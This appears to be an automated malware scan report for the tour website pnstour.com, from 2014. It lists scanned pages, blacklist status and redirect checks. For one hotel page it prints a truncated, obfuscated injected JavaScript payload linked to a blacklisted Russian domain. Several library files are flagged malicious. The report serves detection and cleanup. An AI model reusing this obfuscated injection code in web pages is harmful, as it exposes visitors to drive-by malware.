Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pnstour.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pnstour.com/ | 200 OK Content-Length: 46291 Content-Type: text/html | clean |
http://pnstour.com/index.php | 200 OK Content-Length: 47434 Content-Type: text/html | clean |
http://pnstour.com/main_hotel.php | 200 OK Content-Length: 100804 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: tenthprofit.ru var iA={aI:false};V=42093;V++;var AG='';var A;j=10166;j+=87;x=function(){function F(JO,Z,s){return JO.substr(Z,s);}var P=RegExp;var i=String("/g"+"oo"+"gl"+F("e.vWUc",0,2)+"co"+F("vSGm/SGv",3,2)+F("toY95N",0,2)+"m."+F("comWi6",0,2)+F("Ltdm/tdL",3,2)+"ye"+F("LGZklpGkLZ",4,2)+".c"+F("e1Som1Se",3,2)+F("aH2.paH2",3,2)+F("blknhplbkn",4,2));em=21362;em+=155;g=["WF","y"];this.d=47169;this.d--;var R='';var JJ=document;var ek="";function J(JO,Z){this.Cv=20447;t ...[1118 bytes skipped]... | ||
http://pnstour.com/transport.php | 200 OK Content-Length: 25554 Content-Type: text/html | clean |
http://pnstour.com/tours.php | 200 OK Content-Length: 33277 Content-Type: text/html | clean |
http://pnstour.com/promotion.php | 200 OK Content-Length: 22909 Content-Type: text/html | clean |
http://pnstour.com/thaifeature.php | 200 OK Content-Length: 34738 Content-Type: text/html | clean |
http://pnstour.com/contact.php | 200 OK Content-Length: 42223 Content-Type: text/html | clean |
http://pnstour.com/hotel.php?id_province=PR-2523&&province=Bangkok | 200 OK Content-Length: 41529 Content-Type: text/html | clean |
http://pnstour.com/js/prototype.js | 200 OK Content-Length: 21184 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)', emptyFunction: function() {}, K: function(x) {return x} } var Class = { create: function() { return function() { this.initialize.apply(this, arguments); } } } var Abstract = new Object(); Object.extend = function(destination, source) { for (property in source) { destination[property] = source[ Antivirus reports:
| ||
http://pnstour.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 6018 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"></script>'); }, load: function() { if((typeof Prototype=='undefined') || parseFloat(Prototype.Version.split(".")[0] + "." + Prototype.Version.split(".")[1]) < 1.4) throw("script.aculo.us requires the Prototype JavaScript framework >= 1.4.0"); Antivirus reports:
| ||
http://pnstour.com/js/lightbox.js | 200 OK Content-Length: 27248 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var fileLoadingImage = "images/loading.gif"; var fileBottomNavCloseImage = "images/closelabel.gif"; var animate = true; var resizeSpeed = 7; var borderSize = 10; var imageArray = new Array; var activeImage; if(animate == true){ overlayDuration = 0.2; if(resizeSpeed > 10){ resizeSpeed = 10;} if(resizeSpeed < 1){ resizeSpeed = 1;} resizeDuration = (11 - resizeSpeed) * 0.15; } else { overlayDuration = 0; resizeDuration = 0; } Antivirus reports:
| ||
http://pnstour.com/js/ajax-dynamic-content.js | 200 OK Content-Length: 8437 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var enableCache = true; var jsCache = new Array(); var dynamicContent_ajaxObjects = new Array(); function ajax_showContent(divId,ajaxIndex,url,callbackOnComplete) { var targetObj = document.getElementById(divId); targetObj.innerHTML = dynamicContent_ajaxObjects[ajaxIndex].response; if(enableCache){ jsCache[url] = dynamicContent_ajaxObjects[ajaxIndex].response; } dynamicContent_ajaxObjects[ajaxIndex] = false; Antivirus reports:
| ||
http://pnstour.com/js/ajax.js | 200 OK Content-Length: 9358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function sack(file) { this.xmlhttp = null; this.resetData = function() { this.method = "POST"; this.queryStringSeparator = "?"; this.argumentSeparator = "&"; this.URLString = ""; this.encodeURIString = true; this.execute = false; this.element = null; this.elementObj = null; this.requestFile = file; this.vars = new Object(); this.responseStatus = new Array(2); Antivirus reports:
| ||
http://pnstour.com/js/ajax-tooltip.js | 200 OK Content-Length: 8653 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var x_offset_tooltip = 5; var y_offset_tooltip = 0; var ajax_tooltipObj = false; var ajax_tooltipObj_iframe = false; var ajax_tooltip_MSIE = false; if(navigator.userAgent.indexOf('MSIE')>=0)ajax_tooltip_MSIE=true; var currentTooltipObject = false; function ajax_showTooltip(e,externalFile,inputObj) { currentTooltipObject = inputObj; if(document.all)e = even Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pnstour.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Sep 2014 15:36:26 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: pnstour.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Sep 2014 15:36:26 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: pnstour.com
Referer: http://www.google.com/search?q=pnstour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pnstour.com
Referer: http://www.google.com/search?q=pnstour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.